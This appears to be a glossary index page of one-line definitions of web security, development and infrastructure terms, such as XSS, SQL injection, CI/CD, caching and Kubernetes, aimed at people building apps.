Learn
Plain-English explanations of the concepts that matter when building and launching your app.
Security
Cross-Site Scripting (XSS)
An attack where malicious code is injected into a website, running in other users' browsers to steal data or hijack sessions.
SQL Injection
An attack where malicious database commands are inserted through input fields, allowing attackers to read, modify, or delete your entire database.
Cross-Site Request Forgery (CSRF)
An attack that tricks a logged-in user's browser into making unwanted requests to your app, like changing their password or transferring money.
Broken Access Control
When users can access data or perform actions they shouldn't be allowed to — like viewing other users' data or accessing admin features.
CORS (Cross-Origin Resource Sharing)
A browser security mechanism that controls which websites can make requests to your API.
Rate Limiting
Restricting how many requests a user or IP address can make to your API in a given time period, preventing abuse and protecting resources.
OWASP Top 10
The ten most critical security risks for web applications, published by the OWASP Foundation (https://owasp.
JWT (JSON Web Token) Security
JWTs are tokens used for authentication — they contain encoded user data and a signature to verify authenticity.
Secrets Management
The practice of securely storing, accessing, and rotating sensitive credentials like API keys, database passwords, and encryption keys.
Dependency Audit
Checking the third-party packages your app uses for known security vulnerabilities, outdated versions, and licensing issues.
Authentication
The process of verifying that a user is who they claim to be.
Authorization
The process of determining what actions or resources a verified user is allowed to access.
OAuth
An open standard protocol that allows users to grant third-party apps limited access to their accounts without sharing their passwords.
API Key Security
Best practices for generating, storing, transmitting, and rotating API keys — the secret tokens that grant access to APIs and third-party services.
Encryption
The process of converting readable data into an unreadable format using mathematical algorithms, so only authorized parties with the correct key can decode it.
Hashing
A one-way mathematical function that converts data into a fixed-size string of characters.
Session Management
The mechanism for maintaining a user's authenticated state across multiple requests.
Input Validation
The practice of checking and sanitizing all data received from users or external sources before processing it.
Security Headers
HTTP response headers that instruct browsers to enforce security policies, protecting users from common attacks like cross-site scripting, clickjacking, and data sniffing.
Content Security Policy (CSP)
An HTTP header that controls which resources (scripts, styles, images, etc.
HTTPS / SSL / TLS
Protocols that encrypt communication between a user's browser and your server, preventing eavesdropping, tampering, and impersonation.
Two-Factor Authentication (2FA)
A security method requiring users to provide two different types of identification before accessing an account — typically something they know (password) and something they have (phone or security key).
Penetration Testing
A simulated cyberattack on your application performed by security professionals to find vulnerabilities before real attackers do.
Zero Trust
A security model based on the principle 'never trust, always verify.
Role-Based Access Control (RBAC)
A method of restricting system access based on user roles (like admin, editor, viewer) rather than individual user permissions.
Data Breach
An incident where unauthorized individuals gain access to confidential data, such as user information, credentials, or financial records.
Supply Chain Attack
A cyberattack that targets your application by compromising a third-party dependency, tool, or service that your app relies on — rather than attacking your code directly.
Web Application Firewall (WAF)
A security layer that monitors, filters, and blocks malicious HTTP traffic to and from a web application.
DDoS Protection
Measures to defend against Distributed Denial-of-Service attacks, where attackers flood your application with massive amounts of traffic to overwhelm and crash it.
Token Security
Best practices for creating, storing, transmitting, and invalidating the tokens (JWTs, API keys, session tokens) that control access to your application and its data.
Development
Technical Debt
The accumulated cost of shortcuts, quick fixes, and deferred quality improvements in your codebase.
CI/CD (Continuous Integration / Continuous Deployment)
Automated pipelines that test your code when you push changes (CI) and deploy it to production automatically when tests pass (CD).
Test Coverage
The percentage of your code that is executed by automated tests.
Code Review
The practice of having another person (or service) examine your code for bugs, security issues, and quality problems before it goes to production.
Error Handling
The practice of anticipating, catching, and gracefully managing errors in your application so users see helpful messages instead of crashes or blank screens.
Vibe Coding
Building software by describing what you want to an AI tool and letting it generate the code — without deeply understanding the code yourself.
API Design
The practice of planning and structuring the endpoints, data formats, authentication, and conventions of an Application Programming Interface so it's consistent, intuitive, and maintainable.
REST API
Representational State Transfer — an architectural style for building APIs that uses standard HTTP methods and URLs to perform operations on resources.
GraphQL
A query language for APIs that lets clients request exactly the data they need in a single request.
WebSockets
A communication protocol that provides full-duplex, persistent connections between a client and server, enabling real-time data exchange without repeated HTTP requests.
Server-Side Rendering (SSR)
A technique where web pages are generated on the server for each request, sending fully formed HTML to the browser.
Static Site Generation (SSG)
A technique where web pages are pre-built at build time and served as static HTML files.
Microservices
An architectural pattern where an application is built as a collection of small, independent services that each handle one business capability and communicate via APIs.
Monorepo
A single version control repository that contains multiple distinct projects, packages, or services.
Design Patterns
Reusable solutions to commonly occurring problems in software design.
Dependency Injection
A design pattern where a component receives its dependencies from the outside rather than creating them internally.
State Management
The approach to storing, updating, and sharing data across your application's components.
Component Architecture
The strategy for breaking a user interface into reusable, self-contained components and defining how they interact, compose, and share data.
Type Safety
The degree to which a programming language or tool prevents type errors — like passing a number where a string is expected.
Linting
Automated static analysis of source code to find programming errors, bugs, stylistic issues, and suspicious patterns before the code runs.
Git Workflow
A defined strategy for how a team uses Git branches, commits, code reviews, and merges to manage code changes.
Code Splitting
A technique that breaks your JavaScript bundle into smaller chunks that are loaded on demand, reducing initial page load time by only sending the code needed for the current page.
Tree Shaking
A build optimization that eliminates unused code (dead code) from your JavaScript bundle by analyzing import/export statements and removing anything that isn't actually used.
Hot Module Replacement (HMR)
A development feature that updates code in the browser instantly when you save a file, without requiring a full page reload.
Progressive Web App (PWA)
A web application that uses modern web technologies to deliver an app-like experience, including offline functionality, push notifications, and the ability to install on a user's home screen.
Serverless Functions
Individual functions that run on-demand in the cloud without you managing servers.
Infrastructure
Environment Variables
Configuration values stored outside your code that change between environments (development, staging, production).
Staging Environment
A copy of your production environment used for testing changes before they go live.
Caching
Storing frequently accessed data closer to where it's needed so it doesn't have to be computed or fetched from the database every time.
CDN (Content Delivery Network)
A network of servers worldwide that serves your static content (images, CSS, JavaScript) from locations close to your users, making your site load faster.
API Gateway
A single entry point for all API requests that handles authentication, rate limiting, routing, and monitoring before requests reach your backend services.
Load Balancing
Load balancing distributes incoming traffic across multiple servers so no single server gets overwhelmed.
Auto-Scaling
Auto-scaling automatically adds or removes server capacity based on current demand.
Database Indexing
A database index is a data structure that speeds up queries by letting the database find rows without scanning the entire table.
Connection Pooling
Connection pooling maintains a cache of open database connections that your app reuses instead of opening a new one for every request.
Message Queues
A message queue is a buffer that holds tasks or events so they can be processed asynchronously by worker services.
Monitoring & Observability
Monitoring tracks whether your system is healthy; observability lets you understand why it isn't when something goes wrong.
Logging
Logging is the practice of recording events, errors, and state changes from your application so you can review what happened after the fact.
Backup & Recovery
Backup and recovery is the practice of regularly copying your data to a safe location and having a tested process to restore it.
Blue-Green Deployment
Blue-green deployment runs two identical production environments — one live (blue) and one staging the next release (green).
Docker Containers
Docker containers package your application and all its dependencies into a single portable unit that runs identically on any machine.
Kubernetes
Kubernetes is an open-source system for automating the deployment, scaling, and management of containerized applications across a cluster of machines.
DNS Management
DNS (Domain Name System) translates human-readable domain names like app.
SSL Certificates
An SSL/TLS certificate proves your website's identity and enables encrypted HTTPS connections.
Infrastructure as Code
Infrastructure as Code (IaC) means managing servers, databases, and cloud resources through version-controlled configuration files instead of manual clicks in a dashboard.
Feature Flags
Feature flags are toggles in your code that let you enable or disable features at runtime without deploying new code.
A/B Testing
A/B testing (split testing) shows different versions of a feature to different user groups simultaneously and measures which performs better.
Database Migration
A database migration is a versioned, incremental change to your database schema — adding a column, creating a table, or modifying indexes.
Edge Computing
Edge computing runs code on servers physically close to your users around the world, rather than in a single central data center.
Cron Jobs
Cron jobs are scheduled tasks that run automatically at defined time intervals — every hour, every day at midnight, every Monday morning.